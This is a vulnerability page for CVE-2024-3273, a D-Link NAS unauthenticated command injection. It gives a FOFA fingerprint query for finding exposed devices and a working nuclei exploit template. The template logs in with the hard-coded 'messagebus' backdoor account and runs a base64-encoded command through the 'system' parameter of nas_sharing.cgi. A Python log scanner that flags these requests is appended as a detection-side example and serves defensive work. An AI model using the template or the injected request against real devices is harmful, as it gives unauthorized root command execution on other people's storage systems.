D-Link
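D-Link NAS Unauthenticated RCE (CVE-2024-3273)
The nas_sharing.cgi interface of D-Link NAS devices has a command execution vulnerability. The flaw is in the "/cgi-bin/nas_sharing.cgi" script and affects its HTTP GET request handler component. It is caused by a backdoor created through a hard-coded account (username "messagebus" with an empty password) together with a command injection issue through the "system" parameter. An unauthenticated attacker can exploit this vulnerability to gain server privileges.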
fofa:"Text:In order to access the ShareCenter, please make sure you are using a recent browser(IE 7+, Firefox 3+, Safari 4+, Chrome 3+, Opera 10+)"


nuclei
id: D-Link_NAS_rce
info:
  name: D-Link_NAS_rce
  description: D-Link NAS 未授权RCE(CVE-2024-3273)
  author: BY
  severity: high
  tags: D-Link
  metadata:
    fofa: "Text:In order to access the ShareCenter, please make sure you are using a recent browser(IE 7+, Firefox 3+, Safari 4+, Chrome 3+, Opera 10+)"
    verified: true
requests:
  - raw:
      - |
        GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system={{base64("id")}} HTTP/1.1
        Host: {{hostname}}
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)
        Accept-Encoding: identity
        Accept: */*
        Connection: keep-alive

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "uid="
          - "root"
        condition: or
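
A detection-side counterpart to the template above, added here as an example and not part of the original page: it scans web access log lines for requests to /cgi-bin/nas_sharing.cgi that use the hard-coded "messagebus" account with an empty password and a "system" parameter, then decodes the base64 value for triage. The combined-style log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Request line of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
TARGET_PATH = "/cgi-bin/nas_sharing.cgi"

# Constructed sample lines (documentation-range addresses), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [10/Apr/2024:08:15:02 +0000] "GET /cgi-bin/nas_sharing.cgi'
    '?user=messagebus&passwd=&cmd=15&system=aWQ= HTTP/1.1" 200 64',
    '192.0.2.10 - - [10/Apr/2024:08:16:40 +0000] "GET /cgi-bin/nas_sharing.cgi'
    '?user=admin&passwd=x&cmd=1 HTTP/1.1" 200 512',
    '192.0.2.11 - - [10/Apr/2024:08:17:01 +0000] "GET /index.html HTTP/1.1" 200 1024',
]


def decode_system(value):
    """Best-effort base64 decode of the 'system' parameter for triage."""
    value = value.replace(" ", "+")  # parse_qs turns '+' into a space
    try:
        padded = value + "=" * (-len(value) % 4)
        return base64.b64decode(padded, validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None  # not valid base64; the raw value is still reported


def inspect_line(line):
    """Return a finding if the line matches the request pattern described above."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if url.path != TARGET_PATH:
        return None
    params = parse_qs(url.query, keep_blank_values=True)
    user = params.get("user", [""])[0]
    passwd = params.get("passwd", [""])[0]
    system = params.get("system", [None])[0]
    # Backdoor account, empty password, and a 'system' parameter present.
    if user != "messagebus" or passwd != "" or system is None:
        return None
    return {"source": line.split(" ", 1)[0], "raw": system,
            "decoded": decode_system(system)}


def scan(lines):
    """Return findings for every matching log line."""
    return [f for f in map(inspect_line, lines) if f]
```

Any finding on an Internet-facing device should be treated as a compromise indicator and the decoded command reviewed, since a 200 response means the CGI handled the request.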